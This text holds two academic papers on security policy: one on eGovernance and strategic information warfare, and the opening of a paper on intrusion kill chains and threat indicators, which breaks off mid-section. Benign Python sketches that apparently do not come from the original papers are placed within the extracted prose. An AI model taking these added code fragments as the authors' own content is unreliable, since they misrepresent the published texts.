eGovernance and Strategic Information Warfare – a Non-<br />

Military Approach<br />

Karim Hamza and Van Dalen<br />

Maastricht School of Management, Netherlands<br />

hamza@msm.nl<br />

dalen@msm.nl<br />

Abstract: Most developed governments, active in reaping the benefits of eGovernance, have by now<br />

discovered the threats of this new approach too. They invest massively to cope with today’s highly<br />

complex decision-making systems, with dramatic changes in economy, technology and Information<br />

Warfare threats, and with their own changing strategies. This creates challenges with respect to<br />

matching decision-making structures. eGovernance is defined by UNESCO as “the use of ICT<br />

(Information and communication technologies) by different actors of the society with the aim to<br />

improve their access to information and to build their capacities”. It may be expected that<br />

eGovernance will gain strategic importance for many governments and that its concepts and tools will<br />

develop dramatically in the coming decade. This will raise the urgency and importance of protecting<br />

government decision-making processes from unsolicited, disturbing external or internal interference.<br />

Security is critical to the success of any eGovernance framework, since such frameworks will to some<br />

degree be open to interactions with different stakeholders, internal (within the boundaries of the state:<br />

pressure groups, political parties, business, citizens) or external (e.g. other states, multinational<br />

businesses, worldwide operating malicious organizations), who may use eGovernance frameworks to<br />

influence the decision-making process in government, create political pressure or even start a cyber<br />

war. This raises a number of prevention issues to cope with, such as instability of the decision-making<br />

processes, or even instability of real development processes in states. It therefore calls for adding a<br />

new dimension, popularly labeled “Information Warfare Strategy”, to the design process of<br />

eGovernance frameworks, with the aim of building safeguarding tools into existing and future<br />

eGovernance frameworks to prevent abuse of such frameworks in practical government decision<br />

cases. Traditionally there is a distinction between military and non-military approaches; the question<br />

has to be raised whether a distinction between technology (ICT) and non-technology tools (such as<br />

diplomacy or legal instruments) would be more appropriate. However, we have to recognize that any<br />

line of distinction is arbitrary and will need to remain dynamic, because the parties involved will learn<br />

and improve.<br />

Keywords: eGovernment, government transformation, public sector information systems, eGovernance<br />

framework, information warfare, non-military strategies<br />

1. Introduction<br />

Rapid change and development in the concepts of eGovernance and Strategic Information Warfare<br />

make it necessary to look for a clear definition of both terms, to examine how they relate to each<br />

other, and to ask how they can impact a government or state. Primary findings show that the main<br />

elements common to these definitions are information and technology. Information is commonly seen<br />

as marking a revolutionary age which needs specific attention, as Drucker noted: “The next information<br />

revolution is well underway. But it is not happening where information scientists, information executives,<br />

and the information industry in general are looking for it. It is not a revolution in technology, machinery,<br />

techniques, software, or speed. It is a revolution in concepts” (Drucker, 1998). From a defensive point<br />

of view, Dearth observed: “Defense is no longer the relatively straightforward issue of the sort and<br />

extent of physical measures that need to be taken to protect one’s valued assets. Many of the assets<br />

requiring protection are in the civil sector, but the protection of them is perhaps not best or properly<br />

done by military means” (Dearth, 2001). This requires tools and techniques that are not only physical<br />

but also conceptual, using non-military approaches to protect the government information represented<br />

in eGovernance.<br />

The presence of threats such as terrorists, competitors, state enemies and malicious organizations<br />

makes information warfare a serious danger to governments and to the private-sector actors attached<br />

to eGovernance frameworks. It heightens the need to develop strategic information warfare capabilities<br />

protecting several dimensions: Military, Physical, Economic, Political, and Social (RAND, 1996).<br />

Governments have to develop technological as well as non-technological tools and mechanisms that<br />

can supplement dynamic eGovernance frameworks. Application domains encompass fields like<br />

Political, Legal and Diplomatic. Interaction between agencies inside and outside the government, as<br />

well as in international affairs, will be needed to define international legal regulations and political<br />

channels to control relevant threats. In the end, it will certainly require (re)definition of the distribution<br />


of responsibilities for international legal arrangements in case of legal disputes, as the ones taking<br />

place in the United Nations or NATO. Special attention has to be devoted to the problem of void<br />

governance spaces which arise in this continually changing playing field and which sometimes call<br />

for ad hoc governance solutions.<br />

This research examines non-military and non-technology approaches to Strategic Information Warfare<br />

related to the development of an eGovernance Framework Design Process Model with regard to<br />

Economic, Political and Social dimensions.<br />

With the following concentrations:<br />

Definition of eGovernance framework<br />

Definition of Strategic Information Warfare<br />

Types of Information Warfare: Cyber War / Cyber Crime / Espionage<br />

Types of threats Internal / External and State / Non State<br />

Importance of eGovernance to national security and the need to cover it in information warfare<br />

strategies.<br />

Non Military response: Policies, Laws, Diplomacies, Awareness and Media<br />

Adaptability to a dynamic eGovernance framework<br />

What conditions of Strategic Information Warfare have to be taken into account in the design<br />

process of eGovernance frameworks<br />

All conditioned by fundamental civil rights to interact with governments and the control on the legality<br />

of such approaches.<br />

2. eGovernance framework<br />

The term ‘eGovernance’ has become very common in the last couple of years, but there is no<br />

standard definition for it, since different governments and organizations use it to suit specific aims or<br />

objectives. The term ‘eGovernment’ is often used instead of ‘eGovernance’ owing to confusion<br />

between the two, although the former is the infrastructure of eGovernance, while eGovernance covers<br />

a broader scope.<br />

Governance focuses on what the government does to make sure that all concerned stakeholders are<br />

part of the decision process and to evaluate the outcomes; it can also be applied at corporate level.<br />

Governance has different types, such as Corporate Governance, Project Governance, Good<br />

Governance, IT Governance, multi-level governance and, finally, eGovernance, which focuses on the<br />

function of governance using technology and information systems as a tool.<br />

The most common definition of eGovernance is the one given by UNESCO as<br />

“the use of ICT (Information and communication technologies) by different actors of the society, with<br />

the aim to improve their access to information and to build their capacities” (UNESCO, 2009). In<br />

more detail, according to UNESCO, governance refers to the exercise of political, economic and<br />

administrative authority in the management of a country’s affairs, including citizens’ articulation of their<br />

interests and exercise of their legal rights and obligations. eGovernance may be understood as the<br />

performance of this governance via the electronic medium in order to facilitate an efficient, speedy<br />

and transparent process of disseminating information to the public, and other agencies, and for<br />

performing government administration activities. eGovernance is generally considered as a wider<br />

concept than eGovernment, since it can bring about a change in the way citizens relate to<br />

governments and to each other. eGovernance can bring forth new concepts of citizenship, both in<br />

terms of citizen needs and responsibilities. Its objective is to engage, enable and empower the citizen<br />

(different stakeholders). The use of information technology can increase the broad involvement of<br />

citizens in the process of governance at all levels by providing the possibility of on-line discussion<br />

groups and by enhancing the rapid development and effectiveness of pressure groups.<br />

Advantages for the government include the government’s ability to provide a better<br />

service in terms of time, making governance more efficient and more effective. In addition, the<br />

transaction costs can be lowered and government services become more accessible.<br />


This leads to the eGovernance Framework, which organizes eGovernance activity and focuses on:<br />

1. Establishing governance, monitoring and control,<br />

2. Developing and responding to strategic direction for the different stakeholders,<br />

3. Defining a roles-and-responsibility matrix, and<br />

4. Adapting to new changes in strategies.<br />
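A minimal sketch of the roles-and-responsibility matrix mentioned in point 3 might look as follows; the stakeholders and duties are hypothetical examples, not prescribed by any eGovernance standard:

```python
# Hypothetical roles-and-responsibility matrix for an eGovernance framework.
# Stakeholders and duties are invented examples for illustration only.
RESPONSIBILITY_MATRIX = {
    "set strategic direction": {
        "responsible": "cabinet office",
        "consulted": ["ministries", "citizen panels"],
    },
    "monitor and control": {
        "responsible": "audit authority",
        "consulted": ["ministries"],
    },
    "security and protection": {
        "responsible": "national CERT",
        "consulted": ["private-sector operators"],
    },
}

def who_is_responsible(activity: str) -> str:
    """Look up the single responsible stakeholder for a framework activity."""
    return RESPONSIBILITY_MATRIX[activity]["responsible"]
```

Making such a matrix explicit supports points 1 and 4 as well: monitoring has a defined owner, and adapting to a new strategy amounts to updating the entries rather than renegotiating roles ad hoc.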

Since eGovernance will be responsible for holding most government, economic and community<br />

information, and will engage different stakeholders internal and external to the country, security and<br />

protection become the biggest concern. Mechling (2000) mentioned that protecting privacy and<br />

security is one of the most common issues in governance, a major concern that can be considered an<br />

obstacle for such systems. Substantially, the defence and security of this framework will be critical to<br />

its success; the political risks of security breaches in this framework are perceived to be far more<br />

serious than other risks, since they can impact the government’s political position, the economy and<br />

citizens.<br />

3. Strategic information warfare<br />

The concept of Information Warfare has been well documented (for example, Schwartau, 1996;<br />

Dearth and Williamson, 1996; Knecht, 1996; Waltz, 1998; Denning, 1999). By definition, the<br />

fundamental weapon and target in information warfare is 'information'. It is the product that has<br />

to be manipulated to the advantage of those trying to influence events. The means of achieving this<br />

are manifold. Protagonists can attempt to directly alter data or to deprive competitors of access to<br />

it. The technology of information collection, storage, and dissemination can be compromised. Using<br />

other, more subtle techniques, the way the data is interpreted can be changed by altering the context<br />

in which it is viewed. Thus, the range of activities in the brief of information warfare is manifest. (Hutchinson,<br />

Warren, 2001)<br />

Figure 1: The relationships between data, context, knowledge and information, and the methods by<br />

which each element can be attacked (Hutchinson, Warren, 2001)<br />
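Figure 1's distinction between attacking data directly and attacking the context in which data is interpreted can be sketched as follows; the sensor scenario and values are invented for illustration:

```python
# Sketch of Figure 1's point: 'information' is data read through a context,
# so an attacker can change the resulting information either by altering
# the data itself or by altering the context in which the data is viewed.
# The sensor scenario and numbers are invented for illustration.

def interpret(data: dict, context: dict) -> str:
    """Derive information by reading raw data through a context."""
    reading = data["sensor_reading"]
    threshold = context["alert_threshold"]
    return "ALERT" if reading >= threshold else "normal"

honest_data = {"sensor_reading": 80}
honest_context = {"alert_threshold": 75}

# Attack on the data: the reading itself is falsified.
tampered_data = {"sensor_reading": 60}

# Attack on the context: the data is untouched, but the threshold against
# which it is interpreted is quietly raised, changing the information derived.
tampered_context = {"alert_threshold": 90}
```

With the honest data and context, the reading of 80 against a threshold of 75 yields an alert; lowering the reading (a data attack) or raising the threshold (a context attack) both suppress it, even though in the second case the data itself is never touched.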


From a military point of view, there is an enemy defined and specific actions and procedures are<br />

prepared for defense or attack, but with eGovernance not all enemies are defined or detected which<br />

encourages delivering a concept to detect such enemies or threats.<br />

There are different definitions and concepts related to information warfare (Libicki, 1995):<br />

Command-and-Control Warfare [C2W];<br />

Intelligence-based Warfare [IBW];<br />

Electronic Warfare [EW];<br />

Psychological Operations [PSYOPS];<br />

Hacker war software-based attacks on information systems;<br />

Information Economic Warfare [IEW] war via the control of information trade;<br />

Cyberwar [combat in the virtual realm].<br />

As an example, the United States has substantial information-based resources, including complex<br />

management systems and infrastructures involving the control of electric power, money flow, air<br />

traffic, oil and gas, and other information-dependent items. U.S. allies and potential coalition partners<br />

are similarly increasingly dependent on various information infrastructures. Conceptually, if and when<br />

potential adversaries attempt to damage these systems using IW techniques, information warfare<br />

inevitably takes on a strategic aspect (Molander, Riddile and Wilson, 1996).<br />

The Basic Features of Strategic Information Warfare:<br />

Low entry cost: Unlike traditional weapon technologies, development of information-based<br />

techniques does not require sizable financial resources or state sponsorship. Information systems<br />

expertise and access to important networks may be the only prerequisites.<br />

Blurred traditional boundaries: Traditional distinctions (public versus private interests, warlike<br />
versus criminal behavior, and geographic boundaries such as those between nations as<br />
historically defined) are complicated by the growing interaction within the information<br />
infrastructure.<br />

4. Types of information warfare: Cyber war / cyber crime / espionage<br />

The Department of Defense (DoD) defines cyberspace as follows: A global domain within the<br />

information environment consisting of the interdependent network of information technology<br />

infrastructures, including the Internet, telecommunications networks, computer systems, and<br />

embedded processors and controllers (DoD Dictionary of Military Terms, 2008).<br />

Recently, cyberspace, which is becoming the main field of information warfare, has started to develop<br />
as a military domain, joining the historic domains of land, sea, air, and space. All this might lead to a<br />
belief that the historic constructs of war, like force, offense, defense, and deterrence, can be applied to<br />
cyberspace with little modification. But cyberspace must be understood in its own terms, and policy<br />
decisions being made for these and other new commands must reflect such understanding. Attempts<br />
to transfer policy constructs from other forms of warfare will not only fail but also hinder policy and<br />
planning (Libicki, 2009).<br />

Denning (1999) outlines the main targets for an information attack, the potential elements<br />
in an information system that are prone to attack and exploitation:<br />

Data stores: for example, computer and human memories.<br />

Communication channels: for example, humans, and telecommunication systems.<br />

Sensors/input devices: for example, scanners, cameras, microphones, human senses.<br />

Output devices: for example, disk writers, printers, human processes.<br />

Manipulators of data: for example, microprocessors, humans, software.<br />

The forms of information warfare most relevant here are as follows:<br />

Strategic Cyber-War: a campaign of cyber-attacks launched by one entity against a state and<br />
its society, primarily but not exclusively for the purpose of affecting the target state’s behavior.<br />
The attacking entity can be a state or a non-state actor (Libicki, 2009).<br />


Cyber-War: actions by a nation-state to penetrate another nation's computers or networks for the<br />

purposes of causing damage or disruption. (Clarke, 2010)<br />

Cyber Crime: refers to any crime that involves a computer and a network, where the computer<br />
may or may not have played an instrumental part in the commission of the crime.<br />

Espionage or spying: involves individuals obtaining information that is considered secret or<br />

confidential without the permission of the holder of this information.<br />

5. Types of threats: internal / external and state / non-state<br />

Critical to the success of any eGovernance framework is its security, since such governance<br />
frameworks will to some extent be open to interactions with different stakeholders, who may, by<br />
making use of eGovernance frameworks, influence the decision-making process in the government,<br />
create political pressure or even start a cyber-war.<br />

A. Internal stakeholders [domestic] (within the boundaries of the state), such as:<br />
Pressure groups;<br />
Political parties;<br />
Businesses;<br />
Citizens;<br />
Organized crime, etc.<br />
or<br />
B. External stakeholders [foreign] (outside the boundaries of the state), such as:<br />
Other states;<br />
Multinational businesses;<br />
Worldwide operating malicious organizations, etc.<br />

Given the wide array of possible opponents, weapons, and strategies, it becomes increasingly difficult<br />

to distinguish between foreign and domestic sources of IW threats and actions. You may not know<br />

who’s under attack by whom, or who’s in charge of the attack. This greatly complicates the traditional<br />

role distinction between domestic law enforcement, on the one hand, and national security and<br />

intelligence entities on the other. Another consequence of this blurring phenomenon is the<br />

disappearance of clear distinctions between different levels of anti-state activity, ranging from crime to<br />

warfare (Molander, Riddile and Wilson, 1996).<br />

6. The importance of eGovernance to national security and the need for its<br />
coverage in information warfare strategies<br />

The presence of threats like terrorists, competitors, state enemies and malicious organizations makes<br />
the threat of information warfare very important to governments and to the private sector attached to<br />
eGovernance frameworks. It raises high attention to developing strategic information warfare<br />
capabilities to protect dimensions such as the military, physical, economic, political and social<br />
(Molander, Riddile and Wilson, 1996).<br />

7. Non-military response: Policies, laws, diplomacy, awareness and media<br />

Governments have to develop military as well as non-military tools and mechanisms that can<br />
supplement dynamic eGovernance frameworks. Application domains encompass fields like the<br />
political, legal and diplomatic. Interaction between agencies inside and outside the government, in<br />
addition to international affairs, will be needed to define international legal regulations and political<br />
channels to control relevant threats. In the end, it will certainly require a (re)definition of the<br />
distribution of responsibilities for international legal arrangements in case of legal disputes, as takes<br />
place in the United Nations or NATO.<br />

The appropriate role for the government in responding to the strategic information warfare threats<br />
affecting the eGovernance framework needs to be addressed; this role is to be part leadership and<br />
part partnership with the domestic sector. In addition to being the performer of certain basic functions,<br />
such as organizing, equipping, training, and sustaining military forces, the government may play a more<br />


productive and efficient role as facilitator and maintainer of some information systems and<br />
infrastructure, and through policy mechanisms such as tax breaks to encourage reducing vulnerability<br />
and improving recovery and reconstitution capability. An important factor is the traditional change in<br />
the government’s role as one moves from national defense through public safety toward things that<br />
represent the public good. Clearly, the government’s perceived role in this area will have to be<br />
balanced against public perceptions of the loss of civil liberties and the commercial sector’s concern<br />
about unwarranted limits on its practices and markets.<br />

When responding to information warfare, military strategy can thus no longer focus just on support to<br />
and the conduct of operations. It must also examine the implications of information warfare for the<br />
state’s and its allies’ strategic infrastructures (military, physical, economic, political, and social) that<br />
depend upon information systems and information support.<br />

Figure 2: Strategic information warfare impact (Molander, Riddile and Wilson, 1996)<br />

Governments can use and develop different tools and techniques to handle such situations:<br />

Research and Development: The government’s role in defending against such threats, apart from<br />

protecting its own systems, is indirect: Sponsor research, development, and standard creation in<br />

computer network defense. Maximize the incentives for private industry to keep its own house in<br />

order. Increase the resources devoted to cyber forensics, including the distribution of honeypots<br />

to trap rogue code for analysis. Encourage information-sharing among both private and public<br />

network operators. Invest in threat intelligence. Subsidize the education of computer security<br />

professionals. All are current agenda items. In a cyberwar, all would receive greater emphasis.<br />

(Libicki, 2009)<br />

Policy: defining policies that deal with different strategic information warfare threats and engage<br />
different international parties, and working to settle what constitutes an act of war, which may be<br />
defined in one of three ways: universally, multilaterally, or unilaterally. A universal<br />
definition is one that every state accepts. The closest analog to “every state” is when the United<br />
Nations says that something is an act of war. The next-closest analog is if enough nations have<br />
signed a treaty that says as much. No such United Nations dictum exists, and no treaty says as<br />
much. One might argue that a cyber attack (which is an output of strategic information warfare) is<br />
like something else that is clearly an act of war, but unless there is a global consensus that such<br />
an analogy is valid, it cannot be defined as an act of war.<br />

Laws: develop clear laws to criminalize actions that threaten the eGovernance framework,<br />
especially internal threats.<br />
Diplomacy: develop networks of allies to discover joint threats that could affect each other’s<br />
governance, through intelligence and early detection.<br />


Awareness and media: create citizen/personal awareness for those working with and using the<br />
eGovernance framework: how to protect themselves, how to report violations, awareness of the<br />
different types of threat, and the legal consequences of violations.<br />

8. Conclusion<br />

It is becoming obvious that eGovernance will become the information backbone of any government,<br />
which creates a strong relation to strategic information warfare, since both are based on information<br />
and use technology. In addition, eGovernance will contain most of the government’s and community’s<br />
information and will become one of the main battlefields of the future. This requires a different kind of<br />
attention, since not all existing warfare techniques will be applicable to handling eGovernance threats;<br />
the response should include non-military approaches like policy, diplomacy and law.<br />

The main challenge for an eGovernance framework is adaptability, since continuous changes in<br />
government strategies and in the surrounding environment, plus continuous changes in technology<br />
and in threat parties, whether internal or external, will require continuous development to cope with<br />
such changes and with a complex decision-making structure. Some conditions of strategic information<br />
warfare also have to be taken into account in the design process of eGovernance frameworks, such<br />
as control of different stakeholders, monitoring and detection, continuous development, and the<br />
definition of different sets of response approaches to deal with the rapidly changing environment and<br />
the changing enemy map.<br />

References<br />

Bhatnagar, S. (2004) eGovernment: From Vision to Implementation, Sage Publications.<br />
Clarke, R.A. (2010) Cyber War: The Next Threat to National Security and What to Do About It, Ecco.<br />
Dearth, D.H. (2001) “Implications and Challenges of Applied Information Operations”, Joint Military<br />
Intelligence Training Center, Washington D.C., Journal of Information Warfare, Vol 1, Issue 1.<br />
Denning, D.E. (1999) Information Warfare and Security, Addison Wesley, Reading, Mass.<br />
DoD Dictionary of Military Terms (October 2008), Washington, D.C., Joint Doctrine Division, J-7.<br />
Drucker, P.F. (August 24, 1998) “The Next Information Revolution”, Forbes ASAP.<br />
Hutchinson, W. and Warren, M. (2001) “Principles of Information Warfare”, Journal of Information<br />
Warfare, Vol 1, Issue 1, pp 1-6, ISSN 1445-3312 print/ISSN 1445-3347.<br />
Hutchinson, W.E. and Warren, M.J. (1999) “Attacking the Attackers: Attitudes of Australian IT<br />
Managers to Retaliation Against Hackers”, ACIS (Australasian Conference on Information Systems)<br />
99, December, Wellington, New Zealand.<br />
Libicki, M.C. (2009) Cyberdeterrence and Cyberwar, RAND Corporation, Project Air Force.<br />
Libicki, M.C. (May 1995) “What Is Information Warfare?”, Strategic<br />
Mechling, J. (2000) Eight Imperatives for Leaders in a Networked World, Massachusetts, The Harvard<br />
Policy Group.<br />
Molander, R.C., Riddile, A.S. and Wilson, P.A. (1996) Strategic Information Warfare: A New Face of<br />
War, Office of the Secretary of Defense, National Defense Research Institute, RAND.<br />
Schwartau, W. (1996) Information Warfare, second edition, Thunder’s Mouth Press, New York.<br />
UNESCO (2009) http://portal.unesco.org/ci/en/ev.php-URL_ID=4404&URL_DO=DO_TOPIC&URL_SECTION=201.html (extracted 07.10.2010).<br />
Waltz, E. (1998) Information Warfare: Principles and Operations, Artech House, Norwood.<br />
World Bank, http://go.worldbank.org/M1JHE0Z280 (extracted on 02.10.2010).<br />



Intelligence-Driven Computer Network Defense Informed<br />

by Analysis of Adversary Campaigns and Intrusion Kill<br />

Chains<br />

Eric Hutchins, Michael Cloppert and Rohan Amin<br />

Lockheed Martin, USA<br />

eric.m.hutchins@lmco.com<br />

michael.j.cloppert@lmco.com<br />

rohan.m.amin@lmco.com<br />

Abstract: Conventional network defense tools such as intrusion detection systems and anti-virus focus on the<br />

vulnerability component of risk, and traditional incident response methodology presupposes a successful<br />

intrusion. An evolution in the goals and sophistication of computer network intrusions has rendered these<br />

approaches insufficient for certain actors. A new class of threats, appropriately dubbed the “Advanced Persistent<br />

Threat” (APT), represents well-resourced and trained adversaries that conduct multi-year intrusion campaigns<br />

targeting highly sensitive economic, proprietary, or national security information. These adversaries accomplish<br />

their goals using advanced tools and techniques designed to defeat most conventional computer network<br />

defense mechanisms. Network defense techniques which leverage knowledge about these adversaries can<br />

create an intelligence feedback loop, enabling defenders to establish a state of information superiority which<br />

decreases the adversary's likelihood of success with each subsequent intrusion attempt. Using a kill chain model<br />

to describe phases of intrusions, mapping adversary kill chain indicators to defender courses of action, identifying<br />

patterns that link individual intrusions into broader campaigns, and understanding the iterative nature of<br />

intelligence gathering form the basis of intelligence-driven computer network defense (CND). Institutionalization<br />

of this approach reduces the likelihood of adversary success, informs network defense investment and resource<br />

prioritization, and yields relevant metrics of performance and effectiveness. The evolution of advanced persistent<br />

threats necessitates an intelligence-based model because in this model the defenders mitigate not just<br />

vulnerability, but the threat component of risk, too.<br />

Keywords: incident response, intrusion detection, intelligence, threat, APT, computer network defense<br />

1. Introduction<br />

As long as global computer networks have existed, so have malicious users intent on exploiting<br />

vulnerabilities. Early evolutions of threats to computer networks involved self-propagating code.<br />

Advancements over time in anti-virus technology significantly reduced this automated risk. More<br />

recently, a new class of threats, intent on the compromise of data for economic or military<br />

advancement, emerged as the largest element of risk facing some industries. This class of threat has<br />

been given the moniker “Advanced Persistent Threat,” or APT. To date, most organizations have<br />

relied on the technologies and processes implemented to mitigate risks associated with automated<br />

viruses and worms which do not sufficiently address focused, manually operated APT intrusions.<br />

Conventional incident response methods fail to mitigate the risk posed by APTs because they make<br />

two flawed assumptions: response should happen after the point of compromise, and the compromise<br />

was the result of a fixable flaw (Mitropoulos et al., 2006; National Institute of Standards and<br />

Technology, 2008).<br />

APTs have recently been observed and characterized by both industry and the U.S. government. In<br />

June and July 2005, the U.K. National Infrastructure Security Co-ordination Centre (UK-NISCC) and<br />

the U.S. Computer Emergency Response Team (US-CERT) issued technical alert bulletins describing<br />

targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information. These<br />

intrusions were over a significant period of time, evaded conventional firewall and anti-virus<br />

capabilities, and enabled adversaries to harvest sensitive information (UK-NISCC, 2005; US-CERT,<br />

2005). Epstein and Elgin (2008) of Business Week described numerous intrusions into NASA and<br />

other government networks where APT actors were undetected and successful in removing sensitive<br />

high-performance rocket design information. In February 2010, iSec Partners noted that current<br />

approaches such as anti-virus and patching are not sufficient, end users are directly targeted, and<br />

threat actors are after sensitive intellectual property (Stamos, 2010).<br />

Before the U.S. House Armed Services Committee Subcommittee on Terrorism, Unconventional<br />

Threats and Capabilities, James Andrew Lewis of the Center for Strategic and International Studies<br />

testified that intrusions occurred at various government agencies in 2007, including the Department of<br />



Eric Hutchins et al.<br />

Defense, State Department and Commerce Department, with the intention of information collection<br />

(Lewis, 2008). With specificity about the nature of computer network operations reportedly emanating<br />

from China, the 2008 and 2009 reports to Congress of the U.S.-China Economic and Security Review<br />

Commission summarized reporting of targeted intrusions against U.S. military, government and<br />

contractor systems. Again, adversaries were motivated by a desire to collect sensitive information<br />

(U.S.-China Economic and Security Review Commission, 2008, 2009). Finally, a report prepared for<br />

the U.S.-China Economic and Security Review Commission, Krekel (2009) profiles an advanced<br />

intrusion with extensive detail demonstrating the patience and calculated nature of APT.<br />

Advances in infrastructure management tools have enabled best practices of enterprise-wide patching<br />

and hardening, reducing the most easily accessible vulnerabilities in networked services. Yet APT<br />

actors continually demonstrate the capability to compromise systems by using advanced tools,<br />

customized malware, and “zero-day” exploits that anti-virus and patching cannot detect or mitigate.<br />

Responses to APT intrusions require an evolution in analysis, process, and technology; it is possible<br />

to anticipate and mitigate future intrusions based on knowledge of the threat. This paper describes an<br />

intelligence-driven, threat-focused approach to study intrusions from the adversaries’ perspective.<br />

Each discrete phase of the intrusion is mapped to courses of action for detection, mitigation and<br />

response. The phrase “kill chain” describes the structure of the intrusion, and the corresponding<br />

model guides analysis to inform actionable security intelligence. Through this model, defenders can<br />

develop resilient mitigations against intruders and intelligently prioritize investments in new technology<br />

or processes. Kill chain analysis illustrates that the adversary must progress successfully through<br />

each stage of the chain before it can achieve its desired objective; just one mitigation disrupts the<br />

chain and the adversary. Through intelligence-driven response, the defender can achieve an<br />

advantage over the aggressor for APT caliber adversaries.<br />

This paper is organized as follows: section two of this paper documents related work on phase based<br />

models of defense and countermeasure strategy. Section three introduces an intelligence-driven<br />

computer network defense model (CND) that incorporates threat-specific intrusion analysis and<br />

defensive mitigations. Section four presents an application of this new model to a real case study, and<br />

section five summarizes the paper and presents some thoughts on future study.<br />

2. Related work<br />

While the modeling of APTs and corresponding response using kill chains is unique, other phase<br />

based models to defensive and countermeasure strategies exist.<br />

A United States Department of Defense Joint Staff publication describes a kill chain with stages find,<br />

fix, track, target, engage, and assess (U.S. Department of Defense, 2007). The United States Air<br />

Force (USAF) has used this framework to identify gaps in Intelligence, Surveillance and<br />

Reconnaissance (ISR) capability and to prioritize the development of needed systems (Tirpak, 2000).<br />

Threat chains have also been used to model Improvised Explosive Device (IED) attacks (National<br />

Research Council, 2007). The IED delivery chain models everything from adversary funding to attack<br />

execution. Coordinated intelligence and defensive efforts focused on each stage of the IED threat<br />

chain as the ideal way to counter these attacks. This approach also provides a model for identification<br />

of basic research needs by mapping existing capability to the chain. Phase based models have also<br />

been used for antiterrorism planning. The United States Army describes the terrorist operational<br />

planning cycle as a seven step process that serves as a baseline to assess the intent and capability<br />

of terrorist organizations (United States Army Training and Doctrine Command, 2007). Hayes (2008)<br />

applies this model to the antiterrorism planning process for military installations and identifies<br />

principles to help commanders determine the best ways to protect themselves.<br />

Outside of military context, phase based models have also been used in the information security field.<br />

Sakuraba et al. (2008) describe the Attack-Based Sequential Analysis of Countermeasures (ABSAC)<br />

framework that aligns types of countermeasures along the time phase of an attack. The ABSAC<br />

approach includes more reactive post-compromise countermeasures than early detection capability to<br />

uncover persistent adversary campaigns. In an application of phase based models to insider threats,<br />

Duran et al. (2009) describe a tiered detection and countermeasure strategy based on the progress of<br />

malicious insiders. Willison and Siponen (2009) also address insider threat by adapting a phase<br />

based model called Situational Crime Prevention (SCP). SCP models crime from the offender’s<br />

perspective and then maps controls to various phases of the crime. Finally, the security company<br />

Mandiant proposes an “exploitation life cycle”. The Mandiant model, however, does not map courses<br />


of defensive action and is based on post-compromise actions (Mandiant, 2010). Moving detections<br />

and mitigations to earlier phases of the intrusion kill chain is essential for CND against APT actors.<br />

3. Intelligence-driven computer network defense<br />

Intelligence-driven computer network defense is a risk management strategy that addresses the<br />

threat component of risk, incorporating analysis of adversaries, their capabilities, objectives, doctrine<br />

and limitations. This is necessarily a continuous process, leveraging indicators to discover new<br />

activity with yet more indicators to leverage. It requires a new understanding of the intrusions<br />

themselves, not as singular events, but rather as phased progressions. This paper presents a new<br />

intrusion kill chain model to analyze intrusions and drive defensive courses of action.<br />

The effect of intelligence-driven CND is a more resilient security posture. APT actors, by their nature,<br />

attempt intrusion after intrusion, adjusting their operations based on the success or failure of each<br />

attempt. In a kill chain model, just one mitigation breaks the chain and thwarts the adversary,<br />

therefore any repetition by the adversary is a liability that defenders must recognize and leverage. If<br />

defenders implement countermeasures faster than adversaries evolve, it raises the costs an<br />

adversary must expend to achieve their objectives. This model shows, contrary to conventional<br />

wisdom, such aggressors have no inherent advantage over defenders.<br />

3.1 Indicators and the indicator life cycle<br />

The fundamental element of intelligence in this model is the indicator. For the purposes of this paper,<br />

an indicator is any piece of information that objectively describes an intrusion. Indicators can be<br />

subdivided into three types:<br />

Atomic – Atomic indicators are those which cannot be broken down into smaller parts and retain<br />

their meaning in the context of an intrusion. Typical examples here are IP addresses, email<br />

addresses, and vulnerability identifiers.<br />

Computed – Computed indicators are those which are derived from data involved in an incident.<br />

Common computed indicators include hash values and regular expressions.<br />

Behavioral – Behavioral indicators are collections of computed and atomic indicators, often<br />

subject to qualification by quantity and possibly combinatorial logic. An example would be a<br />

statement such as “the intruder would initially use a backdoor which generated network traffic<br />

matching [regular expression] at the rate of [some frequency] to [some IP address], and then<br />

replace it with one matching the MD5 hash [value] once access was established.”<br />
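The three indicator types can be modeled as small data structures. Below is a minimal Python sketch of that taxonomy; the class names, fields, and all example values (IP address, regular expression, hash) are illustrative assumptions, not indicators from the paper:

```python
from dataclasses import dataclass, field

@dataclass(frozen=True)
class AtomicIndicator:
    """Indivisible value that retains meaning on its own (IP, email, CVE id)."""
    kind: str    # e.g. "ip", "email", "cve"
    value: str

@dataclass(frozen=True)
class ComputedIndicator:
    """Value derived from data involved in an incident (hash, regex)."""
    kind: str    # e.g. "md5", "regex"
    value: str

@dataclass
class BehavioralIndicator:
    """Collection of atomic/computed indicators, qualified by logic or quantity."""
    description: str
    parts: list = field(default_factory=list)

# Hypothetical example mirroring the backdoor behavior quoted above:
# beaconing traffic matching a regex to some C2 address, later replaced
# by a second tool identified by an MD5 hash (all values are placeholders).
beacon = BehavioralIndicator(
    description="backdoor beacons to controller, then replaced by second tool",
    parts=[
        ComputedIndicator("regex", r"GET /update\?id=\d+"),
        AtomicIndicator("ip", "203.0.113.7"),
        ComputedIndicator("md5", "d41d8cd98f00b204e9800998ecf8427e"),
    ],
)
assert len(beacon.parts) == 3
```

A behavioral indicator thus composes the other two types, which is why matching one often yields several new atomic or computed indicators to feed back into the life cycle.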

Using the concepts in this paper, analysts will reveal indicators through analysis or collaboration,<br />

mature these indicators by leveraging them in their tools, and then utilize them when matching activity<br />

is discovered. This activity, when investigated, will often lead to additional indicators that will be<br />

subject to the same set of actions and states. This cycle of actions, and the corresponding indicator<br />

states, form the indicator life cycle illustrated in Figure 1.<br />

Figure 1: Indicator life cycle states and transitions<br />
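The cycle of actions and states in Figure 1 can be sketched as a tiny state machine. The state and action names below paraphrase the narrative (revealed by analysis, matured by deployment into tools, utilized when matching activity is found); the transition table itself is an illustrative assumption:

```python
# Indicator life cycle sketch: utilizing an indicator triggers investigation,
# which reveals further indicators and restarts the cycle.
TRANSITIONS = {
    ("revealed", "deploy_to_tools"): "mature",
    ("mature", "activity_matched"): "utilized",
    ("utilized", "investigate"): "revealed",  # new indicators discovered
}

def step(state: str, action: str) -> str:
    """Advance an indicator one step through the life cycle."""
    try:
        return TRANSITIONS[(state, action)]
    except KeyError:
        raise ValueError(f"illegal transition: {action!r} from {state!r}")

state = "revealed"
for action in ("deploy_to_tools", "activity_matched", "investigate"):
    state = step(state, action)
assert state == "revealed"  # one full trip around the cycle
```

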